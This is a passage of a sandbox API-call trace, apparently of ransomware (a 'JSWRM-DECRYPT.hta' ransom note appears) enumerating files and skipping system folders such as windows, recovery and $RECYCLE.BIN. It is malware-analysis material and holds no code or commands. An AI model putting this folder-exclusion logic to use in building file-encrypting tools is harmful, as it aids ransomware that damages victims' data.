ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="..", cAlternateFileName="")) returned 1 [0068.980] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.980] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.980] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fc696cb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fc696cb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fc696cb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.980] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0068.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0068.981] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6d7a0a, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x30a0, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2=".") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="..") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="...") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="windows") returned -1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="recovery") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="perflogs") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="documents and settings") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="system volume information") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOInstallerUI.dll", lpString2="msocache") returned 1 [0068.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOInstallerUI.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0068.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0068.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOInstallerUI.dll", cchWideChar=19, lpMultiByteStr=0x241218, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOInstallerUI.dll", lpUsedDefaultChar=0x0) returned 19 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOInstallerUI.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0068.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOInstallerUI.dll", cchWideChar=19, lpMultiByteStr=0x241178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOInstallerUI.dll", lpUsedDefaultChar=0x0) returned 19 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0068.981] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x5080, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0068.981] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2=".") returned 1 [0068.981] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="..") returned 1 [0068.982] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="...") returned 1 [0068.982] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="windows") returned -1 [0068.982] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="recovery") returned 1 [0068.982] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="perflogs") returned 1 [0068.982] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="documents and settings") returned 1 [0068.982] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.982] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="system volume information") returned 1 [0068.982] lstrcmpiW (lpString1="VSTOLoaderUI.dll", lpString2="msocache") returned 1 [0068.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOLoaderUI.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0068.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOLoaderUI.dll", cchWideChar=16, lpMultiByteStr=0x2410d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOLoaderUI.dll", lpUsedDefaultChar=0x0) returned 16 [0068.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOLoaderUI.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0068.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOLoaderUI.dll", cchWideChar=16, lpMultiByteStr=0x241100, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOLoaderUI.dll", lpUsedDefaultChar=0x0) returned 16 [0068.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0068.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.982] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x5080, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 0 [0068.982] FindClose (in: hFindFile=0x232200 | out: hFindFile=0x232200) returned 1 [0068.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.982] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fc43456, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fc43456, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fc43456, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2264a0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.982] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.983] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.983] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.983] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.983] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.983] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0068.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.983] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.983] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x60002, dwReserved1=0x2264a0, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2=".") returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="..") returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="...") returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="windows") returned -1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="recovery") returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="perflogs") returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="documents and settings") returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="$RECYCLE.BIN") returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="system volume information") returned 1 [0068.983] lstrcmpiW (lpString1="VSTOInstaller.exe", lpString2="msocache") returned 1 [0068.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOInstaller.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOInstaller.exe", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOInstaller.exe", lpUsedDefaultChar=0x0) returned 17 [0068.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOInstaller.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOInstaller.exe", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOInstaller.exe", lpUsedDefaultChar=0x0) returned 17 [0068.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0068.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.984] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x59a70, dwReserved0=0x60002, dwReserved1=0x2264a0, cFileName="VSTOLoader.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2=".") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="..") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="...") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="windows") returned -1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="recovery") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="perflogs") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="documents and settings") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="system volume information") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOLoader.dll", lpString2="msocache") returned 1 [0068.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOLoader.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOLoader.dll", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOLoader.dll", lpUsedDefaultChar=0x0) returned 14 [0068.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0068.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOLoader.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOLoader.dll", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOLoader.dll", lpUsedDefaultChar=0x0) returned 14 [0068.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.984] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.984] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0068.984] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0xbee8, dwReserved0=0x60002, dwReserved1=0x2264a0, cFileName="VSTOMessageProvider.dll", cAlternateFileName="VSTOME~1.DLL")) returned 1 [0068.984] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2=".") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="..") returned 1 [0068.984] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="...") returned 1 [0068.985] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="windows") returned -1 [0068.985] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="recovery") returned 1 [0068.985] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="perflogs") returned 1 [0068.985] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="documents and settings") returned 1 [0068.985] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.985] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="system volume information") returned 1 [0068.985] lstrcmpiW (lpString1="VSTOMessageProvider.dll", lpString2="msocache") returned 1 [0068.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOMessageProvider.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0068.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOMessageProvider.dll", cchWideChar=23, lpMultiByteStr=0x241038, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOMessageProvider.dll", lpUsedDefaultChar=0x0) returned 23 [0068.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOMessageProvider.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0068.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.985] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VSTOMessageProvider.dll", cchWideChar=23, lpMultiByteStr=0x240f20, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VSTOMessageProvider.dll", lpUsedDefaultChar=0x0) returned 23 [0068.985] HeapFree (in: 